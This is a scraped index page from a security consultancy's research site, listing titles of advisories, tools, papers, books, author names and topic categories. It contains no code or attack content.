* Securing Google Cloud Platform – Ten best practices
* Public Report – Android Cloud Backup/Restore
* Much Ado About Hardware Implants
* NCC Group’s Exploit Development Capability: Why and What
* Technical Advisory: Bypassing Workflows Protection Mechanisms – Remote Code
Execution on SharePoint
* Technical Advisory: Mosquitto Broker DoS through a Memory Leak vulnerability
* Improving Your Embedded Linux Security Posture With Yocto
* How I did not get a shell
* Technical Advisory: Mitel MiVoice 5330e Memory Corruption Flaw
* Singularity of Origin
* Proxy Re-Encryption Protocol: IronCore Public Report
* Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms
using Deserialisation of Untrusted Data
* Celebrating NCC Con Europe 2018
* The disadvantages of a blacklist-based approach to input validation
* Securing Teradata Database
* Technical Advisory: Unauthenticated Remote Command Execution through Multiple
Vulnerabilities in Virgin Media Hub 3.0
* Ethics in Security Testing
* Freddy: An extension for automatically identifying deserialisation issues in
Java and .NET applications
* Sobelow Update
* House
* Principal Mapper (pmapper)
* Return of the hidden number problem
* Technical advisory: “ROHNP”- key extraction side channel in multiple crypto
libraries
* CVE-2017-8570 RTF and the Sisfader RAT
* Mallory: Transparent TCP and UDP Proxy
* Mallory and Me: Setting up a Mobile Mallory Gateway
* CyberVillainsCA
* DECTbeacon
* Fuzzbox
* Gizmo
* HTTP Profiler
* Intent Sniffer
* Intent Fuzzer
* iSEC Partners Releases SSLyze
* Jailbreak
* Manifest Explorer
* Package Play
* ProxMon
* pySimReader
* SAML Pummel
* SecureBigIP
* SecureCisco
* SecureCookies
* SecureIE.ActiveX
* WebRATS
* AWS Inventory: A tool for mapping AWS resources
* Extractor
* CMakerer: A small tool to aid CLion’s indexing
* Emissary Panda – A potential new malicious tool
* SMB hash hijacking & user tracking in MS Outlook
* Testing HTTP/2 only web services
* Windows IPC Fuzzing Tools
* WSBang
* WSMap
* Nerve
* Ragweed
* File Fuzzers
* Kivlad
* Android SSL Bypass
* Hiccupy
* iOS SSL Killswitch
* The SSL Conservatory
* TLSPretense — SSL/TLS Client Testing Framework
* tcpprox
* YoNTMA
* Tattler
* PeachFarmer
* Android-KillPermAndSigChecks
* Android-OpenDebug
* Android-SSL-TrustKiller
* Introspy for Android
* RtspFuzzer
* SSLyze v0.8
* NCLoader
* IG Learner Walkthrough
* Forensic Fuzzing Tools
* Security First Umbrella
* Autochrome
* WSSiP: A Websocket Manipulation Proxy
* AssetHook
* Call Map: A Tool for Navigating Call Graphs in Python
* Sobelow: Static analysis for the Phoenix Framework
* G-Scout
* Decoder Improved Burp Suite Plugin
* Python Class Informer: an IDAPython plugin for viewing run-time type
information (RTTI)
* AutoRepeater: Automated HTTP Request Repeating With Burp Suite
* Open Banking: Security considerations & potential risks
* scenester
* port-scan-automation
* Windows DACL Enum Project
* umap
* Shocker
* Zulu
* whitebox
* vlan-hopping
* tybocer
* xcavator
* WindowsJobLock
* Azucar
* Introducing Azucar
* Readable Thrift
* Decoding network data from a Gh0st RAT variant
* Technical Advisory: Multiple Vulnerabilities in ManageEngine Desktop Central
* Discovering Smart Contract Vulnerabilities with GOATCasino
* BLEBoy
* APT15 is Alive and Strong: An Analysis of RoyalCli and RoyalDNS
* TPM Genie: Interposer Attacks Against the Trusted Platform Module Serial Bus
* Technical Advisory: Code Execution by Unsafe Resource Handling in Multiple
Microsoft Products
* Technical Advisory: Code Execution by Viewing Resource Files in .NET
Reflector
* Technical Advisory: Reflected Cross-Site Scripting (XSS) vulnerability in
Jenkins Delivery Pipeline plugin
* Spectre and Meltdown: What you Need to Know
* The economics of defensive security
* HIDDEN COBRA Volgmer: A Technical Analysis
* Integrity destroying malicious code for financial or geopolitical gain: A
vision of the future?
* Kubernetes Security: Consider Your Threat Model
* Mobile & web browser credential management: Security implications, attack
cases & mitigations
* SOC maturity & capability
* Automated Reverse Engineering of Relationships Between Data Structures in C++
Binaries
* Pointer Sequence Reverser (PSR)
* Cisco ASA series part eight: Exploiting the CVE-2016-1287 heap overflow over
IKEv1
* Bypassing Android’s Network Security Configuration
* Technical Advisory – Bomgar Remote Support – Local Privilege Escalation
* Cisco ASA series part seven: Checkheaps
* Adversarial Machine Learning: Approaches & defences
* eBook: Breach notification under GDPR – How to communicate a personal data
breach
* Cisco ASA series part six: Cisco ASA mempools
* The Update Framework (TUF) Security Assessment
* Cisco ASA series part five: libptmalloc gdb plugin
* Technical Advisory: Adobe ColdFusion RMI Registry.bind() Deserialisation RCE
* Technical Advisory: Adobe ColdFusion Object Deserialisation RCE
* Cisco ASA series part four: dlmalloc-2.8.x, libdlmalloc, & dlmalloc on Cisco
ASA
* Decoder Improved Burp Suite plugin release part two
* Cisco ASA series part three: Debugging Cisco ASA firmware
* Managing PowerShell in a modern corporate environment
* Cisco ASA series part two: Static analysis & datamining of Cisco ASA firmware
* Cisco ASA series part one: Intro to the Cisco ASA
* EternalGlue part one: Rebuilding NotPetya to assess real-world resilience
* Technical Advisory: Authentication rule bypass
* Technical Advisory – play-pac4j Authentication rule bypass
* Decoder Improved Burp Suite plugin release part one
* Technical advisory: Remote shell commands execution in ttyd
* Poison Ivy string decryption
* Securing the continuous integration process
* Signaturing an Authenticode anomaly with Yara
* Analysing a recent Poison Ivy sample
* Endpoint connectivity
* DeLux Edition: Getting root privileges on the eLux Thin Client OS
* UK government cyber security guidelines for connected & autonomous vehicles
* Smuggling HTA files in Internet Explorer/Edge
* Database Security Brief: The Oracle Critical Patch Update for April 2007
* Buffer Underruns, DEP, ASLR and improving the Exploitation Prevention
Mechanisms (XPMs) on the Windows platform
* Data-mining with SQL Injection and Inference
* The Pharming Guide – Understanding and preventing DNS related attacks by
phishers
* Weak Randomness Part I – Linear Congruential Random Number Generators
* Exploiting PL/SQL Injection Flaws with only CREATE SESSION Privileges
* Blind Exploitation of Stack Overflow Vulnerabilities
* Slotting Security into Corporate Development
* Creating Arbitrary Shellcode In Unicode Expanded Strings
* Violating Database – Enforced Security Mechanisms
* Hacking the Extensible Firmware Interface
* Advanced Exploitation of Oracle PL/SQL Flaws
* Firmware Rootkits: The Threat to the Enterprise
* Database Security: A Christmas Carol
* Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft
Windows 2003 Server
* Non-flood/non-volumetric Distributed Denial of Service (DDoS)
* VoIP Security Methodology and Results
* E-mail Spoofing and CDONTS.NEWMAIL
* Dangling Cursor Snarfing: A New Class of Attack in Oracle
* Database Servers on Windows XP and the unintended consequences of simple file
sharing
* DNS Pinning and Web Proxies
* Technical advisory: CVE-2017-8592 – XMLHttpRequest in IE followed 307
redirections with additional or customised headers
* Which database is more secure? Oracle vs. Microsoft
* Variations in Exploit methods between Linux and Windows
* Using graph databases to assess the security of thingernets based on the
thingabilities and thingertivity of things
* Live Incident Blog: June Global Ransomware Outbreak
* Beyond data loss prevention
* How to protect yourself & your organisation from phishing attacks
* Rise of the machines: Machine Learning & its cyber security applications
* Combating Java Deserialisation Vulnerabilities with Look-Ahead Object Input
Streams (LAOIS)
* A WarCon 2017 Presentation: Cisco ASA – Exploiting the IKEv1 Heap Overflow –
CVE-2016-1287
* Latest threats to the connected car & intelligent transport ecosystem
* Network Attached Security: Attacking a Synology NAS
* Accessing Private Fields Outside of Classes in Java
* Understanding the insider threat & how to mitigate it
* Matty McMattface: Security implications, mitigations & testing strategies for
biometric facial recognition systems
* Setting a New Standard for Kubernetes Deployments
* Encryption at rest: Not the panacea to data protection
* Applying normalised compression distance for architecture classification
* Microsoft Zero-Day Vulnerability – OLE2Link – Threat Intelligence and
Signatures
* D-LINK DIR-850L web admin interface vulnerable to stack-based buffer overflow
* Fix Bounty
* Unauthenticated XML eXternal Entity (XXE) vulnerability
* General Data Protection Regulation: Knowing your data
* Technical Advisory: Shell Injection in MacVim mvim URI Handler
* Technical Advisory: Shell Injection in SourceTree
* SCOMplicated? – Decrypting SCOM “RunAs” credentials
* Technical Advisory: Multiple Vulnerabilities in Accellion File Transfer
Appliance
* ISM RAT
* Mergers & Acquisitions (M&A) cyber security due diligence
* Advisory-CraigSBlackie-CVE-2016-9795
* Best practices with BYOD
* Technical Advisory: Nexpose Hard‐coded Java Key Store Passphrase Allows
Decryption of Stored Credentials
* Compromising Apache Tomcat via JMX access
* Berserko: Kerberos Authentication for Burp Suite
* Java RMI Registry.bind() Unvalidated Deserialization
* NCC CON Europe 2017
* Understanding cyber risk management vs uncertainty with confidence in 2017
* iOS MobileSlideShow USB Image Class arbitrary code execution.txt
* Denial of Service in Parsing a URL by ierutil.dll
* U plug, we play
* SSL checklist for pentesters
* Dissecting social engineering attacks
* External Enumeration and Exploitation of Email and Web Security Solutions
* Social Engineering
* Phishing Stories
* Automating extraction from malware and recent campaign analysis
* DDoS Common Approaches and Failings
* Absolute Security
* How much training should staff have on cyber security?
* USB under the bonnet: Implications of USB security vulnerabilities in vehicle
systems
* Cyber Essentials Scheme
* Webinar – PCI Version 3.0: Are you ready?
* Webinar: 4 Secrets to a Robust Incident Response Plan
* Cloud Security Presentation
* Webinar: SMACK, SKIP-TLS & FREAK SSL/TLS vulnerabilities
* Revealing Embedded Fingerprints: Deriving intelligence from USB stack
interactions
* Memory Gap
* 44Con2013Game
* creep-web-app-scanner
* ncccodenavi
* Pip3line
* typofinder
* DIBF – Updated
* IODIDE
* CECSTeR
* cisco-SNMP-enumeration
* dotnetpaddingoracle
* dotnetpefuzzing
* easyda
* EDIDFuzzer
* Fat-Finger
* firstexecution
* grepify
* FrisbeeLite
* State-of-the-art email risk
* Ransomware: what organisations can do to survive
* hostresolver
* lapith
* metasploitavevasion
* Maritime Cyber Security: Threats and Opportunities
* IP-reputation-snort-rule-generator
* The L4m3ne55 of Passw0rds: Notes from the field
* Mature Security Testing Framework
* Exporting non-exportable RSA keys
* Black Hat USA 2015 presentation: Broadcasting your attack-DAB security
* The role of security research in improving cyber security
* Self-Driving Cars- The future is now…
* They Ought to Know Better: Exploiting Security Gateways via their Web
Interfaces
* Mobile apps and security by design
* The Myth of Twelve More Bytes: Security on the Post-Scarcity Internet
* When Security Gets in the Way: PenTesting Mobile Apps That Use Certificate
Pinning
* USB Undermining Security Barriers:further adventures with USB
* Software Security Austerity Security Debt in Modern Software Development
* RSA Conference – Mobile Threat War Room
* Finding the weak link in binaries
* To dock or not to dock, that is the question: Using laptop docking stations
as hardware-based attack platforms
* Harnessing GPUs Building Better Browser Based Botnets
* The Browser Hacker’s Handbook
* SQL Server Security
* The Database Hacker’s Handbook
* Social Engineering Penetration Testing
* Public Report – Matrix Olm Cryptographic Review
* Research Insights Volume 8 – Hardware Design: FPGA Security Risks
* Zcash Cryptography and Code Review
* Optimum Routers: Researching Managed Routers
* Peeling back the layers on defence in depth…knowing your onions
* End-of-life pragmatism
* iOS Instrumentation Without Jailbreak
* The Password is Dead, Long Live the Password!
* Microsoft Office Memory Corruption Vulnerability
* Windows 10 USB Mass Storage driver arbitrary code execution in kernel mode
* Elephant in the Boardroom Survey 2016
* A Peek Behind the Great Firewall of Russia
* Avoiding Pitfalls Developing with Electron
* Flash local-with-filesystem Bypass in navigateToURL
* D-Link routers vulnerable to Remote Code Execution (RCE)
* iOS Application Security: The Definitive Guide for Hackers and Developers
* The Mobile Application Hacker’s Handbook
* Research Insights Volume 9 – Modern Security Vulnerability Discovery
* Post-quantum cryptography overview
* The CIS Security Standard for Docker available now
* An adventure in PoEKmon NeutriGo land
* The Shellcoder’s Handbook: Discovering and Exploiting Security Holes, 2nd
Edition
* How will GDPR impact your communications?
* Potential false redirection of web site content in Internet in SAP NetWeaver
web applications
* Multiple security vulnerabilities in SAP NetWeaver BSP Logon
* The Automotive Threat Modeling Template
* My name is Matt – My voice is my password
* Ransomware: How vulnerable is your system?
* NCC Group WhitepaperUnderstanding and HardeningLinux ContainersJune 29, 2016
– Version 1.1
* My Hash is My Passport: Understanding Web and Mobile Authentication
* Project Triforce: Run AFL on Everything!
* Writing Exploits for Win32 Systems from Scratch
* How to Backdoor Diffie-Hellman
* Local network compromise despite good patching
* Sakula: an adventure in DLL planting
* When a Trusted Site in Internet Explorer was Anything But
* GSM/GPRS Traffic Interception for Penetration Testing Engagements
* An Adaptive-Ciphertext Attack Against “I ⊕ C” Block Cipher Modes With an
Oracle
* Creating a Safer OAuth User Experience
* Attacking Web Service Security: Message Oriented Madness, XML Worms and Web
Service Security Sanity
* Aurora Response Recommendations
* Blind Security Testing – An Evolutionary Approach
* Building Security In: Software Penetration Testing
* Cleaning Up After Cookies
* Command Injection in XML Signatures and Encryption
* Common Flaws of Distributed Identity and Authentication Systems
* Cross Site Request Forgery: An Introduction to a Common Web Application
Weakness
* Developing Secure Mobile Applications for Android
* Exposing Vulnerabilities in Media Software
* Hunting SQL Injection Bugs
* IAX Voice Over-IP Security
* ProxMon: Automating Web Application Penetration Testing
* iSEC’s Analysis of Microsoft’s SDL and its ROI
* Secure Application Development on Facebook
* Secure Session Management With Cookies for Web Applications
* Security Compliance as an Engineering Discipline
* Weaknesses and Best Practices of Public Key Kerberos with Smart Cards
* Exploiting Rich Content
* HTML5 Security The Modern Web Browser Perspective
* An Introduction to Authenticated Encryption
* Attacks on SSL
* Content Security Policies Best Practices
* Windows Phone 7 Application Security Survey
* Browser Extension Password Managers
* Introducing idb-Simplified Blackbox iOS App Pentesting
* Login Service Security
* The factoring dead: Preparing for the cryptopocalypse
* Auditing Enterprise Class Applications and Secure Containers on Android
* Early CCS Attack Analysis
* Analysis of Boomerang Differential Trials via a SAT-Based Constraint Solver
URSA
* Perfect Forward Security
* Internet of Things Security
* Secure Messaging for Normal People
* Understanding and Hardening Linux Containers
* Adventures in Windows Driver Development: Part 1
* Private sector cyber resilience and the role of data diodes
* From CSV to CMD to qwerty
* General Data Protection Regulation – are you ready?
* Business Insights: Cyber Security in the Financial Sector
* The Importance of a Cryptographic Review
* osquery Application Security Assessment Public Report
* Sysinternals SDelete: When Secure Delete Fails
* Ricochet Security Assessment Public Report
* Breaking into Security Research at NCC Group
* Building Systems from Commercial Components
* Modernizing Legacy Systems: Software Technologies, Engineering Processes, and
Business Practices
* Secure Coding in C and C++
* CERT Oracle Secure Coding Standard for Java
* CERT C Secure Coding Standard
* Java Coding Guidelines: 75 Recommendations for Reliable and Secure Programs
* Professional C Programming LiveLessons, (Video Training) Part I: Writing
Robust, Secure, Reliable Code
* Secure Coding in C and C++, 2nd Edition
* The CERT® C Coding Standard, Second Edition: 98 Rules for Developing Safe,
Reliable, and Secure Systems
* Secure Coding Rules for Java LiveLessons, Part 1
* Hacking Displays Made Interesting
* What the HEC? Security implications of HDMI Ethernet Channel and other
related protocols
* 44CON Workshop – How to assess and secure iOS apps
* Payment Card Industry Data Security Standard (PCI DSS) A Navigation and
Explanation of Changes from v2.0 to v3.0
* Mobile World Congress – Mobile Internet of Things
* Practical SME security on a shoestring
* BlackHat Asia USB Physical Access
* How we breach network infrastructures and protect them
* Hacking a web application
* Batten down the hatches: Cyber threats facing DP operations
* Threats and vulnerabilities within the Maritime and shipping sectors
* Distributed Ledger (Blockchain) Security and Quantum Computing Implications
* Abusing Privileged and Unprivileged Linux Containers
* A few notes on usefully exploiting libstagefright on Android 5.x
* NCC Con Europe 2016
* Remote Exploitation of Microsoft Office DLL Hijacking (MS15-132) via Browsers
* Phishing Mitigations: Configuring Microsoft Exchange to Clearly Identify
External Emails
* Car Parking Apps Vulnerable To Hacks
* eBook – Do you know how your organisation would react in a real-world attack
scenario?
* Erlang Security 101
* SysAid Helpdesk blind SQL injection
* SysAid Helpdesk stored XSS
* Virtual Access Monitor Multiple SQL Injection Vulnerabilities
* Whatsupgold Premium Directory traversal
* Windows remote desktop memory corruptoin leading to RCE on XPSP3
* Windows USB RNDIS driver kernel pool overflow
* Drones: Detect, Identify, Intercept, and Hijack
* Introducing Chuckle and the Importance of SMB Signing
* Threat Intelligence: Benefits for the Enterprise
* Best Practices for the use of Static Code Analysis within a Real-World Secure
Development Lifecycle
* Secure Device Manufacturing: Supply Chain Security Resilience
* eBook – Planning a robust incident response process
* HDMI Ethernet Channel
* Advanced SQL Injection in SQL Server Applications
* USB keyboards by post – use of embedded keystroke injectors to bypass autorun
restrictions on modern desktop operating systems
* ASP.NET Security and the Importance of KB2698981 in Cloud Environments
* Xen HYPERVISOR_xen_version stack memory revelation
* Windows Remote Desktop Memory Corruption Leading to RCE on XPSP3
* SysAid Helpdesk Pro – Blind SQL Injection
* Symantec Messaging Gateway SSH with backdoor user account + privilege
escalation to root due to very old Kernel
* Symantec Messaging Gateway Out of band stored XSS delivered by email
* Symantec Messaging Gateway Easy CSRF to add a backdoor-administrator (for
example)
* Symantec Messaging Gateway Arbitrary file download is possible with a crafted
URL (authenticated)
* Symantec Backup Exec 2012 – Persistent XSS Vulnerability Affecting Custom
Reports
* Symantec Backup Exec 2012 – OS version and service pack information leak
* Symantec Backup Exec 2012 – Linux Backup Agent Heap Overflow
* Symantec Backup Exec 2012 Backup/Restore Data Traverses Memory with Weak ACLs
* Symantec Backup Exec 2012 – Backup Exec Utility Stored XSS when adding
Groups, Servers and Computers
* Squiz CMS File Path Traversal
* Solaris 11 USB Hub Class descriptor kernel stack overflow
* SmarterMail – Stored XSS in emails
* Remote code execution in ImpressPages CMS
* OS X 10.6.6 Camera Raw Library Memory Corruption
* Oracle Java Installer Adds a System Path Which is Writable by All
* Oracle Hyperion 11 Directory Traversal
* Oracle E-Business Suite Pre-Auth SQLi with DBA Privileges
* Nessus Authenticated Scan – Local Privilege Escalation
* NCC Group Malware Technical Note
* Nagios XI Network Monitor – Stored and Reflective XSS
* Multiple Vulnerabilities in MailEnable
* Microsoft Internet Explorer CMarkup Use-After-Free
* McAfee Email and Web Security Appliance v5.6 – Session hijacking (and
bypassing client-side session timeouts)
* McAfee Email and Web Security Appliance v5.6 – Password hashes can be
recovered from a system backup and easily cracked
* McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is
possible with a crafted URL, when logged in as any user
* McAfee Email and Web Security Appliance v5.6 – Any logged-in user can bypass
controls to reset passwords of other administrators
* McAfee Email and Web Security Appliance v5.6 – Active session tokens of other
users are disclosed within the UI
* iOS 7 arbitrary code execution in kernel mode
* Understanding Microsoft Word OLE Exploit Primitives
* Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642
Microsoft Office CTaskSymbol Use-After-Free Vulnerability
* Porting the Misfortune Cookie Exploit: A Look into Router Exploitation Using
the TD-8817
* Vehicle Emissions and Cyber Security
* Research Insights Volume 6: Common Issues with Environment Breakouts
* Does TypeScript Offer Security Improvements Over JavaScript?
* Common Security Issues in Financially-Oriented Web Applications
* Research Insights Volume 3 – How are we breaking in: Mobile Security
* Build Your Own Wi-Fi Mapping Drone Capability
* Exploiting CVE-2015-2426, and How I Ported it to a Recent Windows 8.1 64-bit
* Exploiting MS15-061 Use-After-Free Windows Kernel Vulnerability
* Password and brute-force mitigation policies
* Understanding Ransomware: Impact, Evolution and Defensive Strategies
* libtalloc: A GDB plugin for analysing the talloc heap
* Lumension Device Control (formerly Sanctuary) remote memory corruption
* LibAVCodec AMV Out of Array Write
* Increased exploitation of Oracle GlassFish Server Administration Console
Remote Authentication Bypass
* Flash security restrictions bypass: File upload by URLRequest
* Immunity Debugger Buffer Overflow
* DataArmor Full Disk Encryption 3.0.12c – Restricted Environment breakout,
Privilege Escalation and Full Disk Decryption
* Cups-filters remote code execution
* Critical Risk Vulnerability in SAP Message Server (Heap Overflow)
* Critical Risk Vulnerability in SAP DB Web Server (Stack Overflow)
* Critical Risk Vulnerability in Ingres (Pointer Overwrite 2)
* Critical Risk Vulnerability in Ingres (Pointer Overwrite 1)
* Cisco VPN Client Privilege Escalation
* Cisco IPSec VPN Implementation Group Name Enumeration
* Blue Coat BCAAA Remote Code Execution Vulnerability
* BlackBerry Link WebDav Server Bound to the BlackBerry VPN Adapter
* Bit51 Better Security WP Security Plugin – Unauthenticated Stored XSS to RCE
* Back Office Web Administration Authentication Bypass
* AtHoc Toolbar
* ASE 12.5.1 datatype overflow
* Archived Technical Advisories
* Apple QuickTime Player m4a Processing Buffer Overflow
* Apple OSX/iPhone iOS ImageIO TIFF getBandProcTIFF TileWidth Heap Overflow
* Apple Mac OS X ImageIO TIFF Integer Overflow
* Apple CoreAnimation Heap Overflow
* Writing Small Shellcode
* Writing Secure ASP Scripts
* Windows 2000 Format String Vulnerabilities
* The Pentesters Guide to Akamai
* Adobe flash sandbox bypass to navigate to local drives
* Adobe Flash Player Cross Domain Policy Bypass
* Adobe Acrobat Reader XML Forms Data Format Buffer Overflow
* Tool Release: Introducing opinel: Scout2’s favorite tool
* Broadcasting your attack – DAB security
* Modelling Threat Actor Phishing Behaviour
* Research Insights Volume 7: Exploitation Advancements
* Exploiting the win32k!xxxEnableWndSBArrows use-after-free (CVE-2015-0057) bug
on both 32-bit and 64-bit
* The Demise of Signature Based Antivirus
* Stopping Automated Attack Tools
* Security of Things: An Implementers’ Guide to Cyber-Security for Internet of
Things Devices and Beyond
* Security Best Practice: Host Naming & URL Conventions
* Securing PL/SQL Applications with DBMS_ASSERT
* Second-Order Code Injection Attacks
* Revealing Embedded Fingerprints: Deriving Intelligence from USB Stack
Interactions 2013
* Research Insights Volume 4 – Sector Focus: Maritime Sector
* Research Insights Volume 2 – Defensive Trends
* Research Insights Volume 1 – Sector Focus: Financial Services
* Quantum Cryptography – A Study Into Present Technologies and Future
Applications
* Protecting stored cardholder data (an unofficial supplement to PCI DSS V3.0)
* Preparing for Cyber Battleships – Electronic Chart Display and Information
System Security
* Passive Information Gathering – The Analysis of Leaked Network Security
Information
* Oracle Passwords and OraBrute
* Oracle Forensics Part 7 Using the Oracle System Change Number in Forensic
Investigations
* Oracle Forensics Part 6: Examining Undo Segments, Flashback and the Oracle
Recycle Bin
* Oracle Forensics Part 5: Finding Evidence of Data Theft in the Absence of
Auditing
* Oracle Forensics Part 4: Live Response
* Oracle Forensics Part 3: Isolating Evidence of Attacks Against the
Authentication Mechanism
* Oracle Forensics Part 2: Locating Dropped Objects
* Oracle Forensics Part 1: Dissecting the Redo Logs
* Non-stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT
2000 XP
* New Attack Vectors and a Vulnerability Dissection of MS03-007
* More Advanced SQL Injection
* Microsoft’s SQL Server vs. Oracle’s RDBMS
* Microsoft SQL Server Passwords
* Low Cost Attacks on Smart Cards – The Electromagnetic Side-Channel
* Lessons learned from 50 bugs: Common USB driver vulnerabilities
* Inter-Protocol Exploitation
* Inter-Protocol Communication
* Improving your Network and Application Assurance Strategy in an environment
of increasing 0day vulnerabilities
* Implementing and Detecting a PCI Rootkit
* How organisations can properly configure SSL services to ensure the integrity
and confidentiality of data in transit
* Hackproofing Oracle Application Server
* Hackproofing MySQL
* Hackproofing Lotus Domino Web Server
* Hacking Appliances: Ironic exploits in security products
* Fuzzing USB devices using Frisbee Lite
* HDMI – Hacking Displays Made Interesting
* Exploiting Security Gateways Via Web Interfaces
* Research Insights Volume 5 – Sector Focus: Automotive
* The why behind web application penetration test prerequisites
* Blackbox iOS App Assessments Using idb
* Cyber red-teaming business-critical systems while managing operational risk
* Blind Return Oriented Programming
* Username enumeration techniques and their value
* IAM user management strategy (part 2)
* Faux Disk Encryption: Realities of Secure Storage On Mobile Devices
* Some Notes About the Xen XSA-122 Bug
* USB attacks need physical access right? Not any more…
* Image IO Memory Corruption
* Threat Profiling Microsoft SQL Server
* Thin Clients: Slim Security
* Impress Pages CMS Remote Code Execution
* The Phishing Guide: Understanding & Preventing Phishing Attacks
* Lumension Device Control Remote Memory Corruption
* McAfee Email and Web Security Appliance Active session tokens of other users
are disclosed within the UI
* McAfee Email and Web Security Appliance Any logged-in user can bypass
controls to reset passwords of other administrators
* Adam Roberts
* Anthony Ferrillo
* Aaron Greetham
* Aaron Haymore
* Alberto Verza
* Aleksandar Kircanski
* Alessandro Fanio Gonzalez
* Alessandro Fanio González
* Alex Plaskett
* Alex Zaviyalov
* Alvaro Martin Fraguas
* Álvaro Martín Fraguas
* Andrea Shirley-Bellande
* Drew Wade
* Andy Davis
* Andy Grant
* Antonis Terefos
* anvesh3752
* Alexander Smye
* aschmitz
* Author Test
* Ava Howell
* Andrew Whistlecroft
* balazs.bucsay
* Nicolas Bidron
* NCC Group Physical Breach Team
* Rich Warren
* Caleb Watt
* Clinton Carpene
* Cedric Halbronn
* chrisanley
* Christo Butcher
* Clayton Lowell
* Clint Gibler
* cnevncc
* Contributor Test
* corancc
* Corey Arthur
* Christian Powills
* Craig Blackie
* Catalin Visinescu
* Ken Wolstencroft
* Dale Pavey
* Damon Small
* Dan Hastings
* Dave G.
* David Tulis
* David Cash
* Daniele Costa
* destoken
* Diana Dragusin
* Diego Gomez Maranon
* Diego Gómez Marañon
* Domen Puncer Kugler
* Daniel Romero
* Deni
* David Young
* Edward Torkington
* Exploit Development Group
* elenabakoslang
* Eli Sohl
* epliuncc
* Erik Schamper
* Erik Steringer
* Eric Schorn
* fernandogallegopinero
* Aaron Adams
* Gavin Cotter (Temp)
* Gerald Doussot
* Gérald Doussot
* Giacomo Pope
* Global Threat Intelligence
* Guy Morley
* William Handy
* Liew hock lai
* Hollie Mowatt
* Heather Overcash
* Rob Wood
* Iain Smart
* Izzy Whistlecroft
* Jacob Heath
* Jameson Hyde
* Phillip Langlois and Edward Torkington
* Jashan Benawra
* Jason Kielpinski
* Javed Samuel
* James Chambers
* Jelle Vergeer
* Jennifer Reed
* Jeremy Boone
* Jerome Smith
* Jesus Calderon Marin
* Jesús Calderón Marín
* Jay Houppermans
* Jack Leadford
* Joshua Makinen
* John Redford
* Joost Jansen
* Joshua Dow
* Jose Selvi
* Kenneth Yu
* Kat Sommer
* Katarina Dabler
* Ben Lister
* Krijn de Mik
* Lars Behrens
* Lawrence Munro
* Liam Glanfield
* Liam Stevenson
* Liyun Li
* Lucas Rosevear
* Luke Paris
* Matt Lewis
* Manuel Gines
* Margit Hazenbroek
* Marie-Sarah Lacharite
* Mario Rivas
* NCC Group & Fox-IT Data Science Team
* Max Groot
* McCaulay Hudson
* Michael Gough
* Mostafa Hassan
* Matthew Pettitt
* Frank Gifford
* Michelle Simpson
* Neil Bergman
* NCC Group
* NCC Group Publication Archive
* Bill Marquette
* Daniel Lopezjimenez
* nccdavid
* Dan Helton
* RIFT: Research and Intelligence Fusion Team
* R.Rivera
* NCC Group Red Team
* Ilya Zhuravlev
* Jennifer Fernick
* ncckai
* Lewis Lockwood
* Jon Szymaniak
* Mark Manning
* nccmarktedman
* Michael Sandee
* Simon Palmer
* nccricardomr
* Stefano Antenucci
* Simone Salucci and Daniel Lopez Jimenez
* Samuel Siu
* Tanner Prynn
* Yun Zheng Hu
* Stephen Tomkinson
* Nicolas Guigo
* Nick Galloway
* Nick Muir
* Nick Dunn
* Nick Sirris
* Nikolaos Pantazopoulos
* Oliver Brooks
* Ollie Whitehouse
* Ollie Wen
* Parnian Alimi
* Paul Bottinelli
* Peter Scopes
* Peter Hannay
* philipmarsdennccgroupcom
* Pixel Kicks
* Pixel Kicks
* pixelkicks-fiona
* pixelkicks-fred
* pixelkicks-matt.hamer
* pixelkicks-turhan
* pixelkicks-will
* pqueenncc
* Philipp Schaefer
* qkchambers
* Rory McCune
* Rami McCarthy
* Ray Lai
* Robert C. Seacord
* Rennie deGraaf
* Chris Nevin
* Richard Appleby
* Rick Veldhoven
* Fumik0_
* Rindert Kramer
* Rob Ince
* robertgrimes123
* Robert Wessen
* Ross Bradley
* Robert Schwass
* sampeate
* Roger Meyer
* schlopeckincc
* Siddarth Adukia
* Sam Leonard (they/them)
* Spencer Michaels
* sean.morland@nccgroup.com
* Sander de Jong
* Stuart Kurutac
* Subscriber Test
* Sultan Khan
* Swathi Nagarajan
* Simon Watson
* Jeff Dileo
* Thomas Marshall
* Ivan Reedman
* Thomas Pornin
* Jeremy Boone
* Viktor Gazdag
* Vishtasp Jokhi
* Wouter Jansen
* William Groesbeck
* whoughtonncc
* Wordpress SSO Test
* Xavier Garceau-Aranda
* Ken Gannon
* Kevin Henry
* 5G Security & Smart Environments
* Academic Partnership
* Annual Research Report
* Asia Pacific Research
* Awards & Recognition
* Books
* Business Insights
* CIRT
* Cloud & Containerization
* Cloud Security
* Conferences
* Corporate
* Cryptography
* CTFs/Microcorruption
* Current events
* Cyber as a Science
* Cyber Security
* Detection and Threat Hunting
* Disclosure Policy
* Emerging Technologies
* Engineering
* Fox-IT
* Fox-IT and European Research
* Gaming & Media
* Hardware & Embedded Systems
* Intern Projects
* iSec Partners
* Machine Learning
* Managed Detection & Response
* Misinformation, Deepfakes, & Synthetic Media
* North American Research
* Offensive Security & Artificial Intelligence
* Patch notifications
* Presentations
* protocol_name
* Public interest technology
* Public interest technology
* Public Reports
* Public tools
* Reducing Vulnerabilities at Scale
* Research
* Research Paper
* Reverse Engineering
* Risk Management & Governance
* Standards
* Technical advisories
* Technology Policy
* Threat briefs
* Threat Intelligence
* Tool Release
* Transport
* Tutorial/Study Guide
* UK Research
* Uncategorized
* Virtualization, Emulation, & Containerization
* VSR
* Vulnerability
* Whitepapers
Enter a search term
Search
* Eurocrypt 2023: Death of a KEM
* Reverse Engineering Coin Hunt World’s Binary Protocol
* Technical Advisory – Multiple Vulnerabilities in Faronics Insight
(CVE-2023-28344, CVE-2023-28345, CVE-2023-28346, CVE-2023-28347,
CVE-2023-28348, CVE-2023-28349, CVE-2023-28350, CVE-2023-28351,
CVE-2023-28352, CVE-2023-28353)
* Tool Release: Code Query (cq)
* CowCloud
* OffensiveCon 2023 – Exploit Engineering – Attacking the Linux Kernel
* Tool Release: Code Credential Scanner (ccs)
* Exploring Overfitting Risks in Large Language Models
* The Paillier Cryptosystem with Applications to Threshold ECDSA
* Rigging the Vote: Uniqueness in Verifiable Random Functions
* Medical Devices: A Hardware Security Perspective
